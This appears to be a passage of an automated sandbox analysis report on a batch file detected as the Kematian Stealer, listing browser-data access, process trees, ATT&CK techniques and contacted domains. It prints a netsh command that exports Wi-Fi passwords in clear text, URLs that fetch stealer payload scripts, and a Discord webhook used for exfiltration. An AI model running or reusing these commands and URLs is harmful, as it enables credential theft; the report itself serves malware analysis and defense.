            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean
            Uses netsh to dump wireless credentials
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clearJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\Browser Data\cookies_netscape_Chrome.txtJump to behavior
            Source: Yara matchFile source: 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7296, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\kematian.ps1, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected Kematian Stealer
            Source: Yara matchFile source: 0000002C.00000002.2105443989.00000201CC037000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.2105443989.00000201CC032000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information32
            Scripting            		Valid Accounts831
            Windows Management Instrumentation            		32
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		2
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		11
            Process Injection            		1
            Obfuscated Files or Information            		1
            Credentials In Files            		23
            System Information Discovery            		Remote Desktop Protocol31
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            PowerShell            		Logon Script (Windows)Logon Script (Windows)1
            Software Packing            		Security Account Manager841
            Security Software Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading            		LSA Secrets341
            Virtualization/Sandbox Evasion            		SSHKeylogging1
            Proxy            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts341
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Process Injection            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467953 Sample: pirates.bat Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 63 raw.githubusercontent.com 2->63 65 ip-api.com 2->65 67 4 other IPs or domains 2->67 79 Malicious sample detected (through community Yara rule) 2->79 81 Yara detected Kematian Stealer 2->81 83 Yara detected PowerShell ScreenShot 2->83 85 6 other signatures 2->85 12 cmd.exe 2 2->12         started        signatures3 process4 file5 53 C:\Users\user\Desktop\temp.vbs, ASCII 12->53 dropped 101 Suspicious powershell command line found 12->101 103 Command shell drops VBS files 12->103 105 Bypasses PowerShell execution policy 12->105 107 2 other signatures 12->107 16 cscript.exe 2 12->16         started        18 conhost.exe 12->18         started        signatures6 process7 process8 20 cmd.exe 6 16->20         started        process9 22 powershell.exe 15 20->22         started        25 powershell.exe 69 20->25         started        28 powershell.exe 14 14 20->28         started        31 29 other processes 20->31 dnsIp10 87 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 22->87 89 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 22->89 91 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 22->91 99 7 other signatures 22->99 69 ip-api.com 208.95.112.1, 63771, 80 TUT-ASUS United States 25->69 71 www.cloudflare.com 104.16.123.96, 443, 49737, 63770 CLOUDFLARENETUS United States 25->71 93 Loading BitLocker PowerShell Module 25->93 95 Uses netsh to dump wireless credentials 25->95 33 powershell.exe 25->33         started        37 powershell.exe 25->37         started        40 WmiPrvSE.exe 25->40         started        42 netsh.exe 25->42         started        73 raw.githubusercontent.com 185.199.110.133, 443, 49730, 63776 FASTLYUS Netherlands 28->73 55 C:\Users\user\Desktop\kematian.ps1, ASCII 28->55 dropped 97 Found many strings related to Crypto-Wallets (likely being stolen) 28->97 44 net1.exe 1 31->44         started        file11 signatures12 process13 dnsIp14 59 objects.githubusercontent.com 185.199.111.133, 443, 63780 FASTLYUS Netherlands 33->59 75 Found Tor onion address 33->75 77 Tries to harvest and steal browser information (history, passwords, etc) 33->77 61 github.com 140.82.121.3, 443, 63775, 63777 GITHUBUS United States 37->61 51 C:\Users\user\AppData\...\hvw5rqqp.cmdline, Unicode 37->51 dropped 46 csc.exe 37->46         started        file15 signatures16 process17 file18 57 C:\Users\user\AppData\Local\...\hvw5rqqp.dll, PE32 46->57 dropped 49 cvtres.exe 46->49         started        process19

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            pirates.bat3%ReversingLabs
            pirates.bat3%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.cloudflare.com0%VirustotalBrowse
            github.com0%VirustotalBrowse
            raw.githubusercontent.com0%VirustotalBrowse
            ip-api.com0%VirustotalBrowse
            objects.githubusercontent.com1%VirustotalBrowse
            171.39.242.20.in-addr.arpa1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://ip-api.com/json0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://ip-api.com0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
            https://www.cloudflare.com/cdn-cgi/trace0%Avira URL Cloudsafe
            https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps10%Avira URL Cloudsafe
            http://www.microsoft.cv0%Avira URL Cloudsafe
            http://crl.microsoft0%Avira URL Cloudsafe
            https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps10%Avira URL Cloudsafe
            https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps10%Avira URL Cloudsafe
            https://github.com0%Avira URL Cloudsafe
            https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps10%VirustotalBrowse
            https://www.cloudflare.com/cdn-cgi/trace0%VirustotalBrowse
            https://github.cg0%Avira URL Cloudsafe
            https://raw.githubusercontent.c0%Avira URL Cloudsafe
            https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps10%Avira URL Cloudsafe
            http://crl.microsoft0%VirustotalBrowse
            https://github.cg0%VirustotalBrowse
            http://github.com0%Avira URL Cloudsafe
            https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps10%VirustotalBrowse
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps10%Avira URL Cloudsafe
            https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps10%VirustotalBrowse
            https://github.com0%VirustotalBrowse
            https://oneget.orgX0%Avira URL Cloudsafe
            http://www.microsoft.cv0%VirustotalBrowse
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps10%Avira URL Cloudsafe
            http://github.com0%VirustotalBrowse
            https://discord.X0%Avira URL Cloudsafe
            https://aka.ms/winsvr-2022-pshelp0%Avira URL Cloudsafe
            https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps10%Avira URL Cloudsafe
            https://aka.ms/winsvr-2022-pshelpX0%Avira URL Cloudsafe
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps10%VirustotalBrowse
            https://raw.githubusercont0%Avira URL Cloudsafe
            http://www.microsoft.0%Avira URL Cloudsafe
            https://www.cloudflare.com0%Avira URL Cloudsafe
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps10%VirustotalBrowse
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps11%VirustotalBrowse
            https://aka.ms/winsvr-2022-pshelp0%VirustotalBrowse
            https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-28340%Avira URL Cloudsafe
            https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin0%Avira URL Cloudsafe
            http://crl.mh0%Avira URL Cloudsafe
            https://www.cloudflare.com0%VirustotalBrowse
            https://github.com/Pester/Pester1%VirustotalBrowse
            https://github.com/TheWover0%Avira URL Cloudsafe
            http://www.microsoft.2%VirustotalBrowse
            https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvx0%Avira URL Cloudsafe
            https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps10%Avira URL Cloudsafe
            https://objects.githubusercontent.com0%Avira URL Cloudsafe
            https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-28341%VirustotalBrowse
            https://raw.githubusercontent.com0%Avira URL Cloudsafe
            https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps10%VirustotalBrowse
            https://github.com/TheWover0%VirustotalBrowse
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps10%Avira URL Cloudsafe
            https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin0%VirustotalBrowse
            https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvx0%VirustotalBrowse
            https://objects.githubusercontent.com1%VirustotalBrowse
            http://raw.githubusercontent.com0%Avira URL Cloudsafe
            https://raw.githubusercontent.com0%VirustotalBrowse
            https://github.com/Somali-Devs/Kematian-Stealer0%Avira URL Cloudsafe
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js0%Avira URL Cloudsafe
            https://oneget.org0%Avira URL Cloudsafe
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps10%VirustotalBrowse
            http://crl.mh0%VirustotalBrowse
            http://raw.githubusercontent.com0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.cloudflare.com
            		104.16.123.96
            		truefalseunknown
            github.com
            		140.82.121.3
            		truetrueunknown
            raw.githubusercontent.com
            		185.199.110.133
            		truetrueunknown
            ip-api.com
            		208.95.112.1
            		truetrueunknown
            objects.githubusercontent.com
            		185.199.111.133
            		truefalseunknown
            171.39.242.20.in-addr.arpa
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1true
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.cloudflare.com/cdn-cgi/tracefalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1false
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1false
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.binfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1false
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1true
              		unknown
              http://ip-api.com/line/?fields=hostingfalse
              • URL Reputation: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.microsoft.cvpowershell.exe, 00000028.00000002.2909000081.0000017E802B9000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://crl.microsoftpowershell.exe, 00000028.00000002.2902014674.0000017E80199000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1powershell.exe, 0000002C.00000002.2100725567.00000201C8F76000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.compowershell.exe, 0000002C.00000002.2105443989.00000201CBAED000.00000004.00000800.00020000.00000000.sdmptrue
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://ip-api.com/jsonpowershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.cgpowershell.exe, 00000030.00000002.2636336709.000002A872D27000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://raw.githubusercontent.cpowershell.exe, 00000014.00000002.1765711117.000001EC4713E000.00000004.00000800.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17powershell.exe, 00000030.00000002.2331375157.000000C000247000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://github.compowershell.exe, 0000002C.00000002.2105443989.00000201CBF9B000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC48591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1947001037.0000029E4A244000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3BB45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAB46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CC350000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://ip-api.compowershell.exe, 00000028.00000002.2928167979.0000017EE8586000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://oneget.orgXpowershell.exe, 00000014.00000002.1765711117.000001EC48328000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
